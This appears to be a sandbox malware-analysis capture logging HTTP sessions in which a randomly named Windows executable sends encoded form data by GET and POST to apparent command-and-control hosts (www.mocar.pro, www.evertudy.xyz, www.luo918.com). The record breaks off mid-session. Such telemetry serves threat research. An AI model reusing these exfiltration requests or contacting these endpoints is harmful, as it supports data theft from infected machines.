Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.8	61449	109.95.158.122	80	6880	C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 08:35:44.422596931 CEST	476	OUT	GET /prg5/?eZ=3HYLM&iJiX_=OUWlBSduFOmbWHHx1+vrCN7lKThtnpeA9WltEIwOsC9+Rnf1YsqGBMTu+SXEa1SqJjg2e+xS43eh4+WwnjHBew+mwyIGh8NWq3ehH5OgTP/98tgqTRgcUpqrv79RN6be7A== HTTP/1.1 Host: www.mocar.pro Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Jul 3, 2024 08:35:45.591829062 CEST	494	IN	HTTP/1.1 301 Moved Permanently Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 x-redirect-by: WordPress location: http://mocar.pro/prg5/?eZ=3HYLM&iJiX_=OUWlBSduFOmbWHHx1+vrCN7lKThtnpeA9WltEIwOsC9+Rnf1YsqGBMTu+SXEa1SqJjg2e+xS43eh4+WwnjHBew+mwyIGh8NWq3ehH5OgTP/98tgqTRgcUpqrv79RN6be7A== x-litespeed-cache: miss content-length: 0 date: Wed, 03 Jul 2024 06:35:45 GMT server: LiteSpeed

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.8	61450	203.161.49.220	80	6880	C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 08:35:50.761028051 CEST	743	OUT	POST /csr7/ HTTP/1.1 Host: www.evertudy.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: max-age=0 Content-Length: 206 Content-Type: application/x-www-form-urlencoded Origin: http://www.evertudy.xyz Referer: http://www.evertudy.xyz/csr7/ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 69 4a 69 58 5f 3d 46 73 77 51 57 65 4e 69 42 71 74 5a 6d 30 6b 61 63 72 37 6b 4d 54 77 75 4a 64 59 75 4c 57 70 31 64 4b 59 44 4c 4f 5a 70 53 55 38 2f 79 4c 77 4c 4e 68 4c 51 6d 58 62 61 4f 6c 51 41 6f 69 32 34 75 61 34 66 31 54 4f 67 68 58 69 6f 4a 39 2f 32 5a 58 72 69 45 46 69 68 50 74 4f 52 42 76 70 45 41 75 55 4d 71 6e 55 74 6d 31 59 48 45 30 52 75 2f 30 41 4b 33 52 6b 72 6c 48 6f 4c 55 53 30 2f 51 45 4f 61 55 70 35 77 4c 36 57 6f 4f 6b 54 72 36 45 4a 6b 58 4f 74 30 5a 7a 6e 31 58 52 43 46 34 6c 42 55 62 77 69 71 6c 37 66 49 4c 59 37 31 2f 6e 54 4a 41 4e 79 6c 33 4f 4d 44 74 30 79 43 50 4e 77 6e 39 55 41 3d Data Ascii: iJiX_=FswQWeNiBqtZm0kacr7kMTwuJdYuLWp1dKYDLOZpSU8/yLwLNhLQmXbaOlQAoi24ua4f1TOghXioJ9/2ZXriEFihPtORBvpEAuUMqnUtm1YHE0Ru/0AK3RkrlHoLUS0/QEOaUp5wL6WoOkTr6EJkXOt0Zzn1XRCF4lBUbwiql7fILY71/nTJANyl3OMDt0yCPNwn9UA=
Jul 3, 2024 08:35:51.366416931 CEST	533	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Jul 2024 06:35:51 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.8	61451	203.161.49.220	80	6880	C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 08:35:53.290265083 CEST	763	OUT	POST /csr7/ HTTP/1.1 Host: www.evertudy.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: max-age=0 Content-Length: 226 Content-Type: application/x-www-form-urlencoded Origin: http://www.evertudy.xyz Referer: http://www.evertudy.xyz/csr7/ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 69 4a 69 58 5f 3d 46 73 77 51 57 65 4e 69 42 71 74 5a 6e 55 55 61 54 73 6e 6b 4f 7a 77 74 47 39 59 75 51 47 70 35 64 4b 6b 44 4c 4d 31 35 53 68 55 2f 78 76 30 4c 4d 6a 76 51 6c 58 62 61 57 31 51 2f 6d 43 32 4a 75 61 31 67 31 52 71 67 68 58 32 6f 4a 34 54 32 5a 6b 54 68 47 56 69 6e 41 4e 4f 54 63 66 70 45 41 75 55 4d 71 6d 77 4c 6d 78 30 48 45 42 5a 75 2b 56 41 4e 35 78 6b 73 67 48 6f 4c 66 79 30 37 51 45 50 4a 55 6f 31 4b 4c 38 61 6f 4f 6c 6a 72 36 56 4a 6c 64 4f 74 32 55 54 6d 6b 55 52 6e 55 32 6c 56 51 63 32 75 74 6e 37 4c 4a 44 4f 57 66 6c 46 62 50 44 4e 61 4f 33 4e 6b 31 6f 44 76 71 56 75 67 58 6a 44 55 45 7a 4f 33 6f 61 41 31 59 6f 50 64 76 74 2b 51 78 6c 68 61 5a Data Ascii: iJiX_=FswQWeNiBqtZnUUaTsnkOzwtG9YuQGp5dKkDLM15ShU/xv0LMjvQlXbaW1Q/mC2Jua1g1RqghX2oJ4T2ZkThGVinANOTcfpEAuUMqmwLmx0HEBZu+VAN5xksgHoLfy07QEPJUo1KL8aoOljr6VJldOt2UTmkURnU2lVQc2utn7LJDOWflFbPDNaO3Nk1oDvqVugXjDUEzO3oaA1YoPdvt+QxlhaZ
Jul 3, 2024 08:35:53.989362955 CEST	533	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Jul 2024 06:35:53 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.8	61452	203.161.49.220	80	6880	C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 08:35:55.822321892 CEST	1780	OUT	POST /csr7/ HTTP/1.1 Host: www.evertudy.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: max-age=0 Content-Length: 1242 Content-Type: application/x-www-form-urlencoded Origin: http://www.evertudy.xyz Referer: http://www.evertudy.xyz/csr7/ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 69 4a 69 58 5f 3d 46 73 77 51 57 65 4e 69 42 71 74 5a 6e 55 55 61 54 73 6e 6b 4f 7a 77 74 47 39 59 75 51 47 70 35 64 4b 6b 44 4c 4d 31 35 53 6e 4d 2f 79 63 38 4c 4e 44 54 51 6b 58 62 61 49 6c 51 2b 6d 43 32 51 75 62 64 6b 31 52 6d 61 68 55 4f 6f 4c 61 62 32 66 56 54 68 63 46 69 6e 59 39 4f 53 42 76 70 56 41 71 77 41 71 6e 41 4c 6d 78 30 48 45 47 70 75 35 45 41 4e 70 42 6b 72 6c 48 6f 48 55 53 30 54 51 43 6e 5a 55 6f 67 31 4c 73 36 6f 4e 47 62 72 37 6e 68 6c 52 4f 74 34 52 54 6d 38 55 52 61 4d 32 6c 35 32 63 32 79 4c 6e 35 72 4a 53 76 32 48 2b 48 48 59 56 38 53 48 79 39 73 73 68 67 6a 4b 65 64 51 6b 6b 51 6f 53 34 72 58 31 58 44 42 47 67 4e 30 34 34 59 6b 57 30 68 2f 56 73 35 56 69 79 35 6f 43 44 42 5a 70 55 67 62 66 70 52 64 78 70 4c 72 6d 37 63 6b 50 65 58 36 41 35 57 41 78 66 48 73 45 58 4e 6c 45 6c 5a 6d 30 66 6f 4f 74 6d 71 46 44 61 4b 2f 6c 67 6e 2b 75 4d 6c 41 69 73 79 75 71 4f 34 2b 4c 70 52 2b 39 78 68 79 6a 4d 75 32 6f 48 39 6f 56 6f 48 72 65 55 36 67 76 62 65 73 4f 4a 35 2b 75 53 41 67 58 [TRUNCATED] Data Ascii: iJiX_=FswQWeNiBqtZnUUaTsnkOzwtG9YuQGp5dKkDLM15SnM/yc8LNDTQkXbaIlQ+mC2Qubdk1RmahUOoLab2fVThcFinY9OSBvpVAqwAqnALmx0HEGpu5EANpBkrlHoHUS0TQCnZUog1Ls6oNGbr7nhlROt4RTm8URaM2l52c2yLn5rJSv2H+HHYV8SHy9sshgjKedQkkQoS4rX1XDBGgN044YkW0h/Vs5Viy5oCDBZpUgbfpRdxpLrm7ckPeX6A5WAxfHsEXNlElZm0foOtmqFDaK/lgn+uMlAisyuqO4+LpR+9xhyjMu2oH9oVoHreU6gvbesOJ5+uSAgXTnMwBDRFYfK24ctQ9aSLqtAQ+x0d2oBBBuAul8his0WfiUr4i5Um7gh2GZWEUZOI4sg8aYWvHPv3K9jB4XW1jSKoCP9l00ryFOdnJnxFP+rzz+0fDhWo9YWTWjWqeMlCMsY//mCSUmbaYPTQlZapylTR+p4hwkdE/4Smz2OeShuOWVAZrQ3nJm3CuOpeeIaWBE/HbqovQeHtPdhVpgzKt+TyzG2x5oqq/VF8Evw/P560AGvrBiqO8yiTG7Db+YpUBBvOkazddQ9gXYW27WWjiDMJWDnzjBRrJCT4/FX7/iiTIWwo638Pm7B3jLBJVCx+4rj43wTqNgvQx2zaJ17UJg///Swx4djBvYNXy5S8/uY0O/mrRkpITsPMH5afG7VxzteMDxiRmcHtXrgyuZG2bz9lmRDRiPU4/nVOMUCKXBVrkcdIOEA2vh30UYvCFmf5aobs8ljdR9goaywPYdmNxGE7AeXOkCRZO025Po5PBqBPdFZ4n7Ue4wNYojaG8WIWVhjdKH0yaApksI8d14hLePkj961Ft2hHah0qFAqhq0uI79ioz9xyE3JMqGw1YqL1hI2eF9KiMqwLR6pyv089lA64ikV4DWO72trywNg13vPswNLVzZ169MMs+NMNnbGQjKrdHR+pRhnWK+fhjnPxszzjdIHoQYp7t3 [TRUNCATED]
Jul 3, 2024 08:35:56.439196110 CEST	533	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Jul 2024 06:35:56 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.8	61453	203.161.49.220	80	6880	C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 08:35:58.358637094 CEST	479	OUT	GET /csr7/?iJiX_=IuYwVr8nXepE7mYHSf+gGVghE+QsK0Y2QdUzXudSXEAptekBSDag4n7LIWAgnje27+AV9TSqmFigDMavfH+dBRmaO8GFftFICNQKrDMfpUc2J19e4FsCw3tJmkJ0eBlHLQ==&eZ=3HYLM HTTP/1.1 Host: www.evertudy.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Jul 3, 2024 08:35:58.976526976 CEST	548	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Jul 2024 06:35:58 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.8	61454	35.227.248.111	80	6880	C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 08:36:04.314574003 CEST	737	OUT	POST /qmv1/ HTTP/1.1 Host: www.luo918.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: max-age=0 Content-Length: 206 Content-Type: application/x-www-form-urlencoded Origin: http://www.luo918.com Referer: http://www.luo918.com/qmv1/ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 69 4a 69 58 5f 3d 32 32 4b 33 65 31 48 6a 68 49 59 4e 56 6d 69 69 34 45 71 45 2f 75 51 4f 33 5a 78 33 47 4b 39 42 6a 37 76 33 64 6d 66 37 74 4f 6e 4e 34 54 4e 72 45 63 36 6c 38 42 6d 75 56 6a 38 53 44 6c 4d 71 44 74 69 46 74 49 75 62 38 68 4c 76 73 33 65 74 2b 76 75 37 53 74 71 57 53 64 4f 6f 74 52 71 59 75 4a 64 61 58 70 6c 6d 75 37 53 46 63 4a 61 54 75 49 54 50 70 42 6c 59 58 61 53 45 73 79 44 2f 41 35 6f 70 56 4b 43 49 59 7a 6e 52 53 61 67 73 49 6d 50 4d 34 46 64 59 6c 6a 6b 46 58 77 2f 76 62 56 51 31 55 58 2f 4d 76 79 52 50 65 6f 67 52 6f 32 48 39 34 37 47 4a 75 55 52 67 45 67 41 37 72 54 4e 61 6a 48 67 3d Data Ascii: iJiX_=22K3e1HjhIYNVmii4EqE/uQO3Zx3GK9Bj7v3dmf7tOnN4TNrEc6l8BmuVj8SDlMqDtiFtIub8hLvs3et+vu7StqWSdOotRqYuJdaXplmu7SFcJaTuITPpBlYXaSEsyD/A5opVKCIYznRSagsImPM4FdYljkFXw/vbVQ1UX/MvyRPeogRo2H947GJuURgEgA7rTNajHg=
Jul 3, 2024 08:36:04.958619118 CEST	176	IN	HTTP/1.1 405 Method Not Allowed Server: nginx/1.20.2 Date: Wed, 03 Jul 2024 06:36:04 GMT Content-Type: text/html Content-Length: 157 Via: 1.1 google Connection: close
Jul 3, 2024 08:36:04.961857080 CEST	157	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.8	61455	35.227.248.111	80	6880	C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 08:36:06.852664948 CEST	757	OUT	POST /qmv1/ HTTP/1.1 Host: www.luo918.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: max-age=0 Content-Length: 226 Content-Type: application/x-www-form-urlencoded Origin: http://www.luo918.com Referer: http://www.luo918.com/qmv1/ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 69 4a 69 58 5f 3d 32 32 4b 33 65 31 48 6a 68 49 59 4e 58 47 53 69 2b 6a 2b 45 75 65 51 50 71 70 78 33 50 71 39 46 6a 37 7a 33 64 69 76 4e 74 39 44 4e 34 32 78 72 48 59 57 6c 35 42 6d 75 65 44 38 58 63 56 4d 6c 44 74 2b 37 74 4b 71 62 38 68 66 76 73 33 4f 74 39 59 36 36 41 4e 71 55 4c 74 4f 6d 79 68 71 59 75 4a 64 61 58 6f 55 44 75 37 61 46 63 61 79 54 38 38 48 4f 67 68 6c 66 65 36 53 45 6e 53 44 42 41 35 6f 66 56 4f 61 75 59 32 6a 52 53 62 51 73 49 79 6a 44 32 46 64 6b 36 7a 6b 58 57 43 36 45 44 30 59 45 59 47 50 35 6e 7a 73 7a 66 65 4e 37 79 55 50 37 37 37 75 69 75 58 35 57 42 58 64 54 78 77 64 71 39 51 33 61 4e 32 69 2b 4e 63 6f 46 66 4b 66 2b 6d 76 33 2f 72 43 75 6f Data Ascii: iJiX_=22K3e1HjhIYNXGSi+j+EueQPqpx3Pq9Fj7z3divNt9DN42xrHYWl5BmueD8XcVMlDt+7tKqb8hfvs3Ot9Y66ANqULtOmyhqYuJdaXoUDu7aFcayT88HOghlfe6SEnSDBA5ofVOauY2jRSbQsIyjD2Fdk6zkXWC6ED0YEYGP5nzszfeN7yUP777uiuX5WBXdTxwdq9Q3aN2i+NcoFfKf+mv3/rCuo
Jul 3, 2024 08:36:07.494982958 CEST	333	IN	HTTP/1.1 405 Method Not Allowed Server: nginx/1.20.2 Date: Wed, 03 Jul 2024 06:36:07 GMT Content-Type: text/html Content-Length: 157 Via: 1.1 google Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.8	61456	35.227.248.111	80	6880	C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 08:36:09.386637926 CEST	1774	OUT	POST /qmv1/ HTTP/1.1 Host: www.luo918.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: max-age=0 Content-Length: 1242 Content-Type: application/x-www-form-urlencoded Origin: http://www.luo918.com Referer: http://www.luo918.com/qmv1/ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 69 4a 69 58 5f 3d 32 32 4b 33 65 31 48 6a 68 49 59 4e 58 47 53 69 2b 6a 2b 45 75 65 51 50 71 70 78 33 50 71 39 46 6a 37 7a 33 64 69 76 4e 74 39 4c 4e 34 67 46 72 48 35 57 6c 2b 42 6d 75 64 44 38 57 63 56 4d 43 44 74 32 33 74 4b 6d 55 38 6e 54 76 2b 6b 32 74 31 4e 57 36 5a 39 71 55 44 4e 4f 72 74 52 72 59 75 4a 4e 57 58 6f 6b 44 75 37 61 46 63 63 4f 54 2f 6f 54 4f 73 42 6c 59 58 61 53 49 73 79 43 73 41 35 77 50 56 4f 57 2b 59 46 62 52 58 4c 41 73 50 48 50 44 70 56 64 63 35 7a 6c 45 57 44 47 62 44 30 55 41 59 47 36 69 6e 30 49 7a 65 36 73 33 75 6c 4c 68 69 36 47 72 6e 57 52 41 45 67 74 71 36 44 55 5a 35 69 66 6c 48 44 65 4c 4d 76 39 52 64 61 43 67 38 70 44 78 6c 6b 58 66 76 37 55 38 52 42 43 30 79 45 63 67 5a 69 31 56 66 6d 63 72 38 69 38 41 62 6b 36 4f 6f 6f 47 77 68 45 30 4b 2b 75 48 6a 7a 70 6d 79 35 4d 6f 39 73 59 32 35 30 77 76 2b 57 4e 51 76 5a 57 78 68 4b 5a 62 68 38 65 67 6f 67 5a 31 32 4f 57 4b 49 35 67 54 48 5a 65 63 55 71 59 70 58 53 57 7a 49 51 64 56 50 76 66 4c 47 48 59 63 49 55 76 32 46 [TRUNCATED] Data Ascii: 